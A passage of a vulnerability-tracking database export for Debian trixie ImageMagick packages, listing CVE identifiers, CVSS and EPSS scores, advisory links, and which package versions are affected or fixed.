vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2026-40183, GHSA-jvgr-9ph5-m8v4

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2yv5-qdeg-9bag

url VCID-381g-7gdr-qydg

vulnerability_id VCID-381g-7gdr-qydg

summary ImageMagick: Magick.NET: ImageMagick and Magick.NET: Denial of Service via malicious MSL file processing

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40312.json

reference_id

reference_type

scores

value	6.2
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40312.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-40312

reference_id

reference_type

scores

value	0.00012
scoring_system	epss
scoring_elements	0.01596
published_at	2026-04-18T12:55:00Z

value	0.00012
scoring_system	epss
scoring_elements	0.01529
published_at	2026-04-16T12:55:00Z

value	4e-05
scoring_system	epss
scoring_elements	0.00199
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-40312

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40312
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40312

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	6.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0

reference_id

reference_type

scores

value	6.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T19:06:40Z/

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	6.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/commit/2a06c7be3bba3326caf8b7a8d1fa2e0d4b88998d

reference_id

reference_type

scores

value	6.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T19:06:40Z/

url

https://github.com/ImageMagick/ImageMagick/commit/2a06c7be3bba3326caf8b7a8d1fa2e0d4b88998d

reference_url

https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19

reference_id

reference_type

scores

value	6.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T19:06:40Z/

url

https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5xg3-585r-9jh5

reference_id

reference_type

scores

value	6.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T19:06:40Z/

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5xg3-585r-9jh5

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-40312

reference_id

reference_type

scores

value	6.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-40312

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2458044
reference_id	2458044
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2458044

reference_url

https://github.com/advisories/GHSA-5xg3-585r-9jh5

reference_id

GHSA-5xg3-585r-9jh5

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-5xg3-585r-9jh5

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2026-40312, GHSA-5xg3-585r-9jh5

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-381g-7gdr-qydg

url VCID-3gtv-1gg5-5fh2

vulnerability_id VCID-3gtv-1gg5-5fh2

summary Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-0284.json

reference_id

reference_type

scores

value	5.1
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-0284.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2022-0284

reference_id

reference_type

scores

value	0.00038
scoring_system	epss
scoring_elements	0.11331
published_at	2026-04-01T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.1147
published_at	2026-04-02T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11529
published_at	2026-04-04T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11314
published_at	2026-04-07T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11396
published_at	2026-04-08T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11454
published_at	2026-04-09T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.1146
published_at	2026-04-11T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11427
published_at	2026-04-12T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11397
published_at	2026-04-13T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11259
published_at	2026-04-16T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.1126
published_at	2026-04-18T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11388
published_at	2026-04-21T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11328
published_at	2026-04-24T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11286
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2022-0284

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	6.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2045943
reference_id	2045943
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2045943

reference_url	https://security.gentoo.org/glsa/202405-02
reference_id	GLSA-202405-02
reference_type
scores
url	https://security.gentoo.org/glsa/202405-02

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2022-0284

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3gtv-1gg5-5fh2

url VCID-3ju6-ah7s-suhh

vulnerability_id VCID-3ju6-ah7s-suhh

summary ImageMagick: heap-based buffer overflow in ReadPSInfo in coders/ps.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-17540.json

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-17540.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-17540

reference_id

reference_type

scores

value	0.0034
scoring_system	epss
scoring_elements	0.56673
published_at	2026-04-01T12:55:00Z

value	0.0034
scoring_system	epss
scoring_elements	0.56744
published_at	2026-04-26T12:55:00Z

value	0.0034
scoring_system	epss
scoring_elements	0.56815
published_at	2026-04-16T12:55:00Z

value	0.0034
scoring_system	epss
scoring_elements	0.56812
published_at	2026-04-18T12:55:00Z

value	0.0034
scoring_system	epss
scoring_elements	0.56727
published_at	2026-04-24T12:55:00Z

value	0.0034
scoring_system	epss
scoring_elements	0.56767
published_at	2026-04-02T12:55:00Z

value	0.0034
scoring_system	epss
scoring_elements	0.56787
published_at	2026-04-21T12:55:00Z

value	0.0034
scoring_system	epss
scoring_elements	0.56764
published_at	2026-04-07T12:55:00Z

value	0.0034
scoring_system	epss
scoring_elements	0.56816
published_at	2026-04-08T12:55:00Z

value	0.0034
scoring_system	epss
scoring_elements	0.5682
published_at	2026-04-09T12:55:00Z

value	0.0034
scoring_system	epss
scoring_elements	0.56828
published_at	2026-04-11T12:55:00Z

value	0.0034
scoring_system	epss
scoring_elements	0.56805
published_at	2026-04-12T12:55:00Z

value	0.0034
scoring_system	epss
scoring_elements	0.56784
published_at	2026-04-13T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-17540

reference_url	https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15826
reference_id
reference_type
scores
url	https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15826

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=942578
reference_id
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=942578

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.1
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://github.com/ImageMagick/ImageMagick/compare/7.0.8-53...7.0.8-54
reference_id
reference_type
scores
url	https://github.com/ImageMagick/ImageMagick/compare/7.0.8-53...7.0.8-54

reference_url	https://github.com/ImageMagick/ImageMagick/compare/master%40%7B2019-07-15%7D...master%40%7B2019-07-17%7D
reference_id
reference_type
scores
url	https://github.com/ImageMagick/ImageMagick/compare/master%40%7B2019-07-15%7D...master%40%7B2019-07-17%7D

reference_url	https://security-tracker.debian.org/tracker/CVE-2019-17540
reference_id
reference_type
scores
url	https://security-tracker.debian.org/tracker/CVE-2019-17540

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1765330
reference_id	1765330
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1765330

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick::::::::
reference_id	cpe:2.3:a:imagemagick:imagemagick::::::::
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick::::::::

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:::::::*
reference_id	cpe:2.3:o:debian:debian_linux:10.0:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:9.0:::::::*
reference_id	cpe:2.3:o:debian:debian_linux:9.0:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:9.0:::::::*

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2019-17540

reference_id

CVE-2019-17540

reference_type

scores

value	6.8
scoring_system	cvssv2
scoring_elements	AV:N/AC:M/Au:N/C:P/I:P/A:P

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

url

https://nvd.nist.gov/vuln/detail/CVE-2019-17540

reference_url	https://access.redhat.com/errata/RHSA-2020:1180
reference_id	RHSA-2020:1180
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2020:1180

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

